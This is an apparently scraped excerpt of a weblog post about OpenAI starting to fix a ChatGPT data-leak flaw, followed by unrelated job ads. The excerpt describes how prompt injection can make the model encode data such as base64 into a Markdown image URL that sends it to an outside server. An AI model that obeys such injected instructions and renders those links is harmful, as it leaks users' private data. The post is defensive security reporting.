s
Dec. 21, 2023, 4:10 a.m. |

Simon Willison's Weblog simonwillison.net

OpenAI Begins Tackling ChatGPT Data Leak Vulnerability


ChatGPT has long suffered from a frustrating data exfiltration vector that can be triggered by prompt injection attacks: it can be instructed to construct a Markdown image reference to an image hosted anywhere, which means a successful prompt injection can request the model encode data (e.g. as base64) and then render an image which passes that data to an external server as part of the query string.

Good news: they've finally put measures …

ai attacks chatgpt chatgpt data chatgpt data leak construct data data leak encode generativeai image llms markdown openai prompt prompt injection promptinjection prompt injection attacks reference security vector vulnerability

Data Architect

@ University of Texas at Austin | Austin, TX

Data ETL Engineer

@ University of Texas at Austin | Austin, TX

Lead GNSS Data Scientist

@ Lurra Systems | Melbourne

Senior Machine Learning Engineer (MLOps)

@ Promaton | Remote, Europe

Software Engineer, Data Tools - Full Stack

@ DoorDash | Pune, India

Senior Data Analyst

@ Artsy | New York City